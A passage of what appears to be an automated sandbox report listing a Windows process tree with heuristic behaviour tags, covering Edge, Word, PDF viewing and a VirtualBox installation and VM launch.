C:\Windows\system32\changepk.exe"C:\Windows\system32\changepk.exe"2⤵PID:2584
-
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" EnterProductKey1⤵
- Suspicious use of SetWindowsHookEx
PID:2504
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl1⤵
- Modifies Control Panel
PID:1700
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:2472
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:3724
-
C:\Windows\System32\winver.exe"C:\Windows\System32\winver.exe"1⤵PID:5624
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
PID:5848
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"1⤵
- Enumerates system info in registry
- NTFS ADS
PID:1400 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe84b646f8,0x7ffe84b64708,0x7ffe84b647182⤵PID:1056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:22⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:32⤵PID:5952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2372 /prefetch:82⤵PID:5752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:12⤵PID:4680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵PID:336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:12⤵PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:12⤵PID:5692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:82⤵PID:2472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:82⤵PID:3588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:12⤵PID:5288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:12⤵PID:5556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:12⤵PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:12⤵PID:3324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:12⤵PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3592 /prefetch:82⤵PID:3160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5956 /prefetch:82⤵PID:6120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:12⤵PID:1696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6252 /prefetch:82⤵PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:12⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 /prefetch:82⤵PID:1744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵PID:1568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:12⤵PID:2992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:12⤵PID:4180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2760 /prefetch:12⤵PID:2128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:12⤵PID:700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6912 /prefetch:82⤵PID:3080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6216 /prefetch:82⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,6227783507172605322,9237454050031184713,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6928 /prefetch:82⤵PID:4388
-
-
C:\Users\Admin\Downloads\VirtualBox-7.0.22-165102-Win.exe"C:\Users\Admin\Downloads\VirtualBox-7.0.22-165102-Win.exe"2⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:2824 -
C:\Program Files\Oracle\VirtualBox\VirtualBox.exe"C:\Program Files\Oracle\VirtualBox\VirtualBox.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5840
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4324
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3644
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
PID:5080 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 7E702228AB7D7F52963E4B2164641B51 C2⤵
- Loads dropped DLL
PID:3192
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 3EB65AF4EF3697F154858613B9D4FEE82⤵
- Loads dropped DLL
PID:4372
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2C0DD223F1645C892197D742F375482C2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5312
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 83AD271A2777484C9A5418EE92017E29 E Global\MSI00002⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:4772
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding E417BF8E4960174B50FAE22FF605644B M Global\MSI00002⤵
- System Location Discovery: System Language Discovery
PID:5728
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2516
-
C:\Windows\System32\colorcpl.exe"C:\Windows\System32\colorcpl.exe"1⤵PID:2140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:3808 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "1" "C:\Program Files\Oracle\VirtualBox\drivers\USB\device\VBoxUSB.inf" "9" "48f6bcb47" "0000000000000188" "WinSta0\Default" "00000000000001D8" "208" "C:\Program Files\Oracle\VirtualBox\drivers\USB\device"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:2944
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "1" "C:\Program Files\Oracle\VirtualBox\drivers\network\netadp6\VBoxNetAdp6.inf" "9" "473b17b7b" "00000000000001D8" "WinSta0\Default" "00000000000001DC" "208" "C:\Program Files\Oracle\VirtualBox\drivers\network\netadp6"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:1504
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "1" "C:\Program Files\Oracle\VirtualBox\drivers\network\netlwf\VBoxNetLwf.inf" "9" "431e52bcb" "00000000000001DC" "WinSta0\Default" "00000000000001D4" "208" "C:\Program Files\Oracle\VirtualBox\drivers\network\netlwf"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:1728
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:3120
-
C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4804 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:5320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Documents\Nhu cai lo ton.pdf2⤵
- Enumerates system info in registry
PID:5024 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffe84b646f8,0x7ffe84b64708,0x7ffe84b647183⤵PID:4196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9118949727968545417,16281453118843477822,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:23⤵PID:1592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9118949727968545417,16281453118843477822,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:33⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9118949727968545417,16281453118843477822,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2744 /prefetch:83⤵PID:3576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9118949727968545417,16281453118843477822,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:13⤵PID:4148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9118949727968545417,16281453118843477822,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:13⤵PID:5156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9118949727968545417,16281453118843477822,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:13⤵PID:5624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2136,9118949727968545417,16281453118843477822,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=3876 /prefetch:63⤵PID:3924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,9118949727968545417,16281453118843477822,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:83⤵PID:1712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,9118949727968545417,16281453118843477822,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:83⤵PID:768
-
-
-
C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe"C:\Program Files\Oracle\VirtualBox\VBoxSVC.exe" -Embedding1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4964 -
C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.exe"C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.exe" --comment dnhauxaorau --startvm fcb2ed03-ab39-49c5-9cef-fcdc4f527cc9 --no-startvm-errormsgbox "--sup-hardening-log=C:\Users\Admin\VirtualBox VMs\dnhauxaorau\Logs\VBoxHardening.log"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2676 -
C:\Program Files\Oracle\VirtualBox\VirtualBoxVM.exe60eaff78-4bdd-042d-2e72-669728efd737-suplib-2ndchild --comment dnhauxaorau --startvm fcb2ed03-ab39-49c5-9cef-fcdc4f527cc9 --no-startvm-errormsgbox "--sup-hardening-log=C:\Users\Admin\VirtualBox VMs\dnhauxaorau\Logs\VBoxHardening.log"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2204
-
-
-
C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe"C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:5316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:5248
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3720
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1768
-
C:\Windows\system32\printfilterpipelinesvc.exeC:\Windows\system32\printfilterpipelinesvc.exe -Embedding1⤵
- Drops file in System32 directory
PID:4388
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵
- System Location Discovery: System Language Discovery
PID:1716
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Documents\1.pdf1⤵
- Enumerates system info in registry
PID:3636 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x12c,0x130,0x134,0x128,0x104,0x7ffe84b646f8,0x7ffe84b64708,0x7ffe84b647182⤵PID:3980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,12734231869706361538,2307824769015680933,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:22⤵PID:972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,12734231869706361538,2307824769015680933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:32⤵PID:836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,12734231869706361538,2307824769015680933,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:82⤵PID:5724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,12734231869706361538,2307824769015680933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:12⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,12734231869706361538,2307824769015680933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵PID:272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,12734231869706361538,2307824769015680933,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:12⤵PID:4648
-
-
